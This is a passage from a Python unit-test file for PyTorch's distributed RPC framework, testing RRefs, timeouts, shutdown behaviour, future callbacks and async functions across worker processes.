def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
# Tests that we can obtain the future corresponding to the creation of
# the RRef on remote end
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
# This test checks local states that are modified by remote workers.
# This means that we would need barrier before and after every check.
# The barrier before the check makes sure that all previous states are
# cleared globally, the barrier after ensures that no following states
# change gets into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
# RRef on local value is not added to context until shared across RPC
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Wait for owner rref to be cleared.
while int(info["num_owner_rrefs"]) != 0:
info = _rref_context_get_debug_info()
time.sleep(0.1)
dist.barrier()
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
@dist_init
def test_disable_gil_profiling(self):
# test that rpc.enable_gil_profiling(false) will result in
# GIL wait time not being recorded.
# GIL profiling should be disabled by default.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
@dist_init(setup_rpc=False)
def test_local_shutdown(self):
# test that we can start RPC and then immediately locally shutdown
# without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
# only test keys in this test case. Values should be covered by
# individual module debug info tests
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
# NB: Key ordering is only preserved in python 3.6+. So here, we
# manually check keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
# This barrier is needed to ensure that some workers do not exit before
# others have been brought up.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
# Shutdown sequence is not very well defined and as a result
# we can see any of the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# A barrier is needed to ensure that all RPCs are processed.
# Otherwise, some RPCs can timeout since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
# futures should time out and be marked with an exception indicating it as such.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# ensure that if a new timeout is set old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
# create a longstanding RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
def test_dist_init_decorator(self):
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
class TestPickler:
pass
test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
timed_out_rpc_event = None
@staticmethod
def timed_out_rpc():
RpcTest.timed_out_rpc_event.wait()
@dist_init
def test_wait_all_exit_early_python(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func)
fut3 = rpc.rpc_async(dst, raise_func)
# We should receive the error from fut2
with self.assertRaisesRegex(ValueError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_builtin(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, "size of tensor"):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_script_function(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_function_not_on_callee(self):
# test that if a function does not exist on a callee, we don't crash,
# instead we get an AttributeError indicating that the func does not exist.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
# Use delattr to remove the binding of a func on this nodes
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
RuntimeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
# This is to make Python not garbage collect a and b.
a.other = b
b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
# We have no guarantee that the add_done_callback fn will execute before the test finishes.
# Adding a 'then' callback that runs afterwards to guarantee we wait for the first callback
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
@dist_init
def test_async_class_rref_proxy(self):
self._test_test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
